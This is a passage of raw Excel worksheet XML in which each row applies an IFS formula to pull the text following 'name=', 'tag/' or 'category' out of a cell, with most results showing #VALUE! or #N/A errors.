    ISNUMBER(FIND("tag/",$A3860)), MID($A3860, FIND("tag/",$A3860) + 4, LEN($A3860) - FIND("tag/",$A3860)),
    ISNUMBER(FIND("category",$A3860)), MID($A3860, FIND("category",$A3860) + 9, LEN($A3860) - FIND("category",$A3860)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3860" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3861" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3861" t="s">
        <v>2575</v>
      </c>
      <c r="B3861" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3861" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3861" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3861" t="e" cm="1">
        <f t="array" ref="E3861">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3861)), MID($A3861, FIND("name=",$A3861) + 5, LEN($A3861) - FIND("name=",$A3861)),
    ISNUMBER(FIND("tag/",$A3861)), MID($A3861, FIND("tag/",$A3861) + 4, LEN($A3861) - FIND("tag/",$A3861)),
    ISNUMBER(FIND("category",$A3861)), MID($A3861, FIND("category",$A3861) + 9, LEN($A3861) - FIND("category",$A3861)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3861" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3862" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3862" t="s">
        <v>2575</v>
      </c>
      <c r="B3862" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3862" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3862" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3862" t="e" cm="1">
        <f t="array" ref="E3862">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3862)), MID($A3862, FIND("name=",$A3862) + 5, LEN($A3862) - FIND("name=",$A3862)),
    ISNUMBER(FIND("tag/",$A3862)), MID($A3862, FIND("tag/",$A3862) + 4, LEN($A3862) - FIND("tag/",$A3862)),
    ISNUMBER(FIND("category",$A3862)), MID($A3862, FIND("category",$A3862) + 9, LEN($A3862) - FIND("category",$A3862)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3862" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3863" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3863" t="s">
        <v>2872</v>
      </c>
      <c r="B3863" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3863" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3863" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3863" t="e" cm="1">
        <f t="array" ref="E3863">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3863)), MID($A3863, FIND("name=",$A3863) + 5, LEN($A3863) - FIND("name=",$A3863)),
    ISNUMBER(FIND("tag/",$A3863)), MID($A3863, FIND("tag/",$A3863) + 4, LEN($A3863) - FIND("tag/",$A3863)),
    ISNUMBER(FIND("category",$A3863)), MID($A3863, FIND("category",$A3863) + 9, LEN($A3863) - FIND("category",$A3863)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3863" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3864" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3864" t="s">
        <v>2601</v>
      </c>
      <c r="B3864" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3864" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3864" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3864" t="e" cm="1">
        <f t="array" ref="E3864">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3864)), MID($A3864, FIND("name=",$A3864) + 5, LEN($A3864) - FIND("name=",$A3864)),
    ISNUMBER(FIND("tag/",$A3864)), MID($A3864, FIND("tag/",$A3864) + 4, LEN($A3864) - FIND("tag/",$A3864)),
    ISNUMBER(FIND("category",$A3864)), MID($A3864, FIND("category",$A3864) + 9, LEN($A3864) - FIND("category",$A3864)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3864" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3865" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3865" t="s">
        <v>2575</v>
      </c>
      <c r="B3865" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3865" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3865" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3865" t="e" cm="1">
        <f t="array" ref="E3865">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3865)), MID($A3865, FIND("name=",$A3865) + 5, LEN($A3865) - FIND("name=",$A3865)),
    ISNUMBER(FIND("tag/",$A3865)), MID($A3865, FIND("tag/",$A3865) + 4, LEN($A3865) - FIND("tag/",$A3865)),
    ISNUMBER(FIND("category",$A3865)), MID($A3865, FIND("category",$A3865) + 9, LEN($A3865) - FIND("category",$A3865)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3865" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3866" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3866" t="s">
        <v>2575</v>
      </c>
      <c r="B3866" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3866" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3866" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3866" t="e" cm="1">
        <f t="array" ref="E3866">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3866)), MID($A3866, FIND("name=",$A3866) + 5, LEN($A3866) - FIND("name=",$A3866)),
    ISNUMBER(FIND("tag/",$A3866)), MID($A3866, FIND("tag/",$A3866) + 4, LEN($A3866) - FIND("tag/",$A3866)),
    ISNUMBER(FIND("category",$A3866)), MID($A3866, FIND("category",$A3866) + 9, LEN($A3866) - FIND("category",$A3866)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3866" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3867" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3867" t="s">
        <v>2873</v>
      </c>
      <c r="B3867" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3867" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3867" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3867" t="e" cm="1">
        <f t="array" ref="E3867">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3867)), MID($A3867, FIND("name=",$A3867) + 5, LEN($A3867) - FIND("name=",$A3867)),
    ISNUMBER(FIND("tag/",$A3867)), MID($A3867, FIND("tag/",$A3867) + 4, LEN($A3867) - FIND("tag/",$A3867)),
    ISNUMBER(FIND("category",$A3867)), MID($A3867, FIND("category",$A3867) + 9, LEN($A3867) - FIND("category",$A3867)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3867" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3868" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3868" t="s">
        <v>2377</v>
      </c>
      <c r="B3868" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3868" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3868" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3868" t="e" cm="1">
        <f t="array" ref="E3868">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3868)), MID($A3868, FIND("name=",$A3868) + 5, LEN($A3868) - FIND("name=",$A3868)),
    ISNUMBER(FIND("tag/",$A3868)), MID($A3868, FIND("tag/",$A3868) + 4, LEN($A3868) - FIND("tag/",$A3868)),
    ISNUMBER(FIND("category",$A3868)), MID($A3868, FIND("category",$A3868) + 9, LEN($A3868) - FIND("category",$A3868)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3868" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3869" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3869" t="s">
        <v>2619</v>
      </c>
      <c r="B3869" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3869" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3869" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3869" t="e" cm="1">
        <f t="array" ref="E3869">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3869)), MID($A3869, FIND("name=",$A3869) + 5, LEN($A3869) - FIND("name=",$A3869)),
    ISNUMBER(FIND("tag/",$A3869)), MID($A3869, FIND("tag/",$A3869) + 4, LEN($A3869) - FIND("tag/",$A3869)),
    ISNUMBER(FIND("category",$A3869)), MID($A3869, FIND("category",$A3869) + 9, LEN($A3869) - FIND("category",$A3869)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3869" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3870" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3870" t="s">
        <v>2410</v>
      </c>
      <c r="B3870" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3870" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3870" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3870" t="e" cm="1">
        <f t="array" ref="E3870">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3870)), MID($A3870, FIND("name=",$A3870) + 5, LEN($A3870) - FIND("name=",$A3870)),
    ISNUMBER(FIND("tag/",$A3870)), MID($A3870, FIND("tag/",$A3870) + 4, LEN($A3870) - FIND("tag/",$A3870)),
    ISNUMBER(FIND("category",$A3870)), MID($A3870, FIND("category",$A3870) + 9, LEN($A3870) - FIND("category",$A3870)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3870" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3871" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3871" t="s">
        <v>2604</v>
      </c>
      <c r="B3871" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3871" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3871" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3871" t="e" cm="1">
        <f t="array" ref="E3871">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3871)), MID($A3871, FIND("name=",$A3871) + 5, LEN($A3871) - FIND("name=",$A3871)),
    ISNUMBER(FIND("tag/",$A3871)), MID($A3871, FIND("tag/",$A3871) + 4, LEN($A3871) - FIND("tag/",$A3871)),
    ISNUMBER(FIND("category",$A3871)), MID($A3871, FIND("category",$A3871) + 9, LEN($A3871) - FIND("category",$A3871)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3871" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3872" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3872" t="s">
        <v>2606</v>
      </c>
      <c r="B3872" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3872" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3872" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3872" t="e" cm="1">
        <f t="array" ref="E3872">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3872)), MID($A3872, FIND("name=",$A3872) + 5, LEN($A3872) - FIND("name=",$A3872)),
    ISNUMBER(FIND("tag/",$A3872)), MID($A3872, FIND("tag/",$A3872) + 4, LEN($A3872) - FIND("tag/",$A3872)),
    ISNUMBER(FIND("category",$A3872)), MID($A3872, FIND("category",$A3872) + 9, LEN($A3872) - FIND("category",$A3872)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3872" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3873" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3873" t="s">
        <v>2605</v>
      </c>
      <c r="B3873" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3873" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3873" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3873" t="e" cm="1">
        <f t="array" ref="E3873">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3873)), MID($A3873, FIND("name=",$A3873) + 5, LEN($A3873) - FIND("name=",$A3873)),
    ISNUMBER(FIND("tag/",$A3873)), MID($A3873, FIND("tag/",$A3873) + 4, LEN($A3873) - FIND("tag/",$A3873)),
    ISNUMBER(FIND("category",$A3873)), MID($A3873, FIND("category",$A3873) + 9, LEN($A3873) - FIND("category",$A3873)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3873" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3874" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3874" t="s">
        <v>2512</v>
      </c>
      <c r="B3874" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3874" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3874" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3874" t="e" cm="1">
        <f t="array" ref="E3874">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3874)), MID($A3874, FIND("name=",$A3874) + 5, LEN($A3874) - FIND("name=",$A3874)),
    ISNUMBER(FIND("tag/",$A3874)), MID($A3874, FIND("tag/",$A3874) + 4, LEN($A3874) - FIND("tag/",$A3874)),
    ISNUMBER(FIND("category",$A3874)), MID($A3874, FIND("category",$A3874) + 9, LEN($A3874) - FIND("category",$A3874)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3874" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3875" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3875" t="s">
        <v>2608</v>
      </c>
      <c r="B3875" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3875" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3875" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3875" t="e" cm="1">
        <f t="array" ref="E3875">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3875)), MID($A3875, FIND("name=",$A3875) + 5, LEN($A3875) - FIND("name=",$A3875)),
    ISNUMBER(FIND("tag/",$A3875)), MID($A3875, FIND("tag/",$A3875) + 4, LEN($A3875) - FIND("tag/",$A3875)),
    ISNUMBER(FIND("category",$A3875)), MID($A3875, FIND("category",$A3875) + 9, LEN($A3875) - FIND("category",$A3875)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3875" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3876" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3876" t="s">
        <v>2607</v>
      </c>
      <c r="B3876" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3876" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3876" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3876" t="e" cm="1">
        <f t="array" ref="E3876">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3876)), MID($A3876, FIND("name=",$A3876) + 5, LEN($A3876) - FIND("name=",$A3876)),
    ISNUMBER(FIND("tag/",$A3876)), MID($A3876, FIND("tag/",$A3876) + 4, LEN($A3876) - FIND("tag/",$A3876)),
    ISNUMBER(FIND("category",$A3876)), MID($A3876, FIND("category",$A3876) + 9, LEN($A3876) - FIND("category",$A3876)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3876" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3877" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3877" t="s">
        <v>2609</v>
      </c>
      <c r="B3877" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3877" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3877" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3877" t="e" cm="1">
        <f t="array" ref="E3877">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3877)), MID($A3877, FIND("name=",$A3877) + 5, LEN($A3877) - FIND("name=",$A3877)),
    ISNUMBER(FIND("tag/",$A3877)), MID($A3877, FIND("tag/",$A3877) + 4, LEN($A3877) - FIND("tag/",$A3877)),
    ISNUMBER(FIND("category",$A3877)), MID($A3877, FIND("category",$A3877) + 9, LEN($A3877) - FIND("category",$A3877)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3877" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3878" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3878" t="s">
        <v>2610</v>
      </c>
      <c r="B3878" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3878" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3878" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3878" t="e" cm="1">
        <f t="array" ref="E3878">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3878)), MID($A3878, FIND("name=",$A3878) + 5, LEN($A3878) - FIND("name=",$A3878)),
    ISNUMBER(FIND("tag/",$A3878)), MID($A3878, FIND("tag/",$A3878) + 4, LEN($A3878) - FIND("tag/",$A3878)),
    ISNUMBER(FIND("category",$A3878)), MID($A3878, FIND("category",$A3878) + 9, LEN($A3878) - FIND("category",$A3878)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3878" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3879" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3879" t="s">
        <v>2611</v>
      </c>
      <c r="B3879" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3879" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3879" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3879" t="e" cm="1">
        <f t="array" ref="E3879">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3879)), MID($A3879, FIND("name=",$A3879) + 5, LEN($A3879) - FIND("name=",$A3879)),
    ISNUMBER(FIND("tag/",$A3879)), MID($A3879, FIND("tag/",$A3879) + 4, LEN($A3879) - FIND("tag/",$A3879)),
    ISNUMBER(FIND("category",$A3879)), MID($A3879, FIND("category",$A3879) + 9, LEN($A3879) - FIND("category",$A3879)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3879" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3880" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3880" t="s">
        <v>2612</v>
      </c>
      <c r="B3880" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3880" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3880" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3880" t="e" cm="1">
        <f t="array" ref="E3880">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3880)), MID($A3880, FIND("name=",$A3880) + 5, LEN($A3880) - FIND("name=",$A3880)),
    ISNUMBER(FIND("tag/",$A3880)), MID($A3880, FIND("tag/",$A3880) + 4, LEN($A3880) - FIND("tag/",$A3880)),
    ISNUMBER(FIND("category",$A3880)), MID($A3880, FIND("category",$A3880) + 9, LEN($A3880) - FIND("category",$A3880)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3880" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3881" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3881" t="s">
        <v>2613</v>
      </c>
      <c r="B3881" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3881" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3881" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3881" t="e" cm="1">
        <f t="array" ref="E3881">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3881)), MID($A3881, FIND("name=",$A3881) + 5, LEN($A3881) - FIND("name=",$A3881)),
    ISNUMBER(FIND("tag/",$A3881)), MID($A3881, FIND("tag/",$A3881) + 4, LEN($A3881) - FIND("tag/",$A3881)),
    ISNUMBER(FIND("category",$A3881)), MID($A3881, FIND("category",$A3881) + 9, LEN($A3881) - FIND("category",$A3881)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3881" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3882" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3882" t="s">
        <v>2614</v>
      </c>
      <c r="B3882" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3882" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3882" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3882" t="e" cm="1">
        <f t="array" ref="E3882">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3882)), MID($A3882, FIND("name=",$A3882) + 5, LEN($A3882) - FIND("name=",$A3882)),
    ISNUMBER(FIND("tag/",$A3882)), MID($A3882, FIND("tag/",$A3882) + 4, LEN($A3882) - FIND("tag/",$A3882)),
    ISNUMBER(FIND("category",$A3882)), MID($A3882, FIND("category",$A3882) + 9, LEN($A3882) - FIND("category",$A3882)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3882" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3883" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3883" t="s">
        <v>2613</v>
      </c>
      <c r="B3883" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3883" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3883" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3883" t="e" cm="1">
        <f t="array" ref="E3883">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3883)), MID($A3883, FIND("name=",$A3883) + 5, LEN($A3883) - FIND("name=",$A3883)),
    ISNUMBER(FIND("tag/",$A3883)), MID($A3883, FIND("tag/",$A3883) + 4, LEN($A3883) - FIND("tag/",$A3883)),
    ISNUMBER(FIND("category",$A3883)), MID($A3883, FIND("category",$A3883) + 9, LEN($A3883) - FIND("category",$A3883)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3883" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3884" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3884" t="s">
        <v>2615</v>
      </c>
      <c r="B3884" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3884" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3884" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3884" t="e" cm="1">
        <f t="array" ref="E3884">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3884)), MID($A3884, FIND("name=",$A3884) + 5, LEN($A3884) - FIND("name=",$A3884)),
    ISNUMBER(FIND("tag/",$A3884)), MID($A3884, FIND("tag/",$A3884) + 4, LEN($A3884) - FIND("tag/",$A3884)),
    ISNUMBER(FIND("category",$A3884)), MID($A3884, FIND("category",$A3884) + 9, LEN($A3884) - FIND("category",$A3884)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3884" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3885" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3885" t="s">
        <v>2616</v>
      </c>
      <c r="B3885" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3885" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3885" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3885" t="e" cm="1">
        <f t="array" ref="E3885">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3885)), MID($A3885, FIND("name=",$A3885) + 5, LEN($A3885) - FIND("name=",$A3885)),
    ISNUMBER(FIND("tag/",$A3885)), MID($A3885, FIND("tag/",$A3885) + 4, LEN($A3885) - FIND("tag/",$A3885)),
    ISNUMBER(FIND("category",$A3885)), MID($A3885, FIND("category",$A3885) + 9, LEN($A3885) - FIND("category",$A3885)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3885" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3886" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3886" t="s">
        <v>2617</v>
      </c>
      <c r="B3886" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3886" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3886" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3886" t="e" cm="1">
        <f t="array" ref="E3886">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3886)), MID($A3886, FIND("name=",$A3886) + 5, LEN($A3886) - FIND("name=",$A3886)),
    ISNUMBER(FIND("tag/",$A3886)), MID($A3886, FIND("tag/",$A3886) + 4, LEN($A3886) - FIND("tag/",$A3886)),
    ISNUMBER(FIND("category",$A3886)), MID($A3886, FIND("category",$A3886) + 9, LEN($A3886) - FIND("category",$A3886)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3886" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3887" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3887" t="s">
        <v>2618</v>
      </c>
      <c r="B3887" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3887" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3887" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3887" t="e" cm="1">
        <f t="array" ref="E3887">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3887)), MID($A3887, FIND("name=",$A3887) + 5, LEN($A3887) - FIND("name=",$A3887)),
    ISNUMBER(FIND("tag/",$A3887)), MID($A3887, FIND("tag/",$A3887) + 4, LEN($A3887) - FIND("tag/",$A3887)),
    ISNUMBER(FIND("category",$A3887)), MID($A3887, FIND("category",$A3887) + 9, LEN($A3887) - FIND("category",$A3887)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3887" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3888" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3888" t="s">
        <v>2621</v>
      </c>
      <c r="B3888" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3888" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3888" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3888" t="e" cm="1">
        <f t="array" ref="E3888">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3888)), MID($A3888, FIND("name=",$A3888) + 5, LEN($A3888) - FIND("name=",$A3888)),
    ISNUMBER(FIND("tag/",$A3888)), MID($A3888, FIND("tag/",$A3888) + 4, LEN($A3888) - FIND("tag/",$A3888)),
    ISNUMBER(FIND("category",$A3888)), MID($A3888, FIND("category",$A3888) + 9, LEN($A3888) - FIND("category",$A3888)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3888" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3889" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3889" t="s">
        <v>2620</v>
      </c>
      <c r="B3889" t="e">
        <f t="shared" si="181"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3889" t="e">
        <f t="shared" si="182"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3889" t="e">
        <f t="shared" si="183"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3889" t="e" cm="1">
        <f t="array" ref="E3889">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3889)), MID($A3889, FIND("name=",$A3889) + 5, LEN($A3889) - FIND("name=",$A3889)),
    ISNUMBER(FIND("tag/",$A3889)), MID($A3889, FIND("tag/",$A3889) + 4, LEN($A3889) - FIND("tag/",$A3889)),
    ISNUMBER(FIND("category",$A3889)), MID($A3889, FIND("category",$A3889) + 9, LEN($A3889) - FIND("category",$A3889)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3889" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3890" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3890" t="s">
        <v>2622</v>
      </c>
      <c r="B3890" t="e">
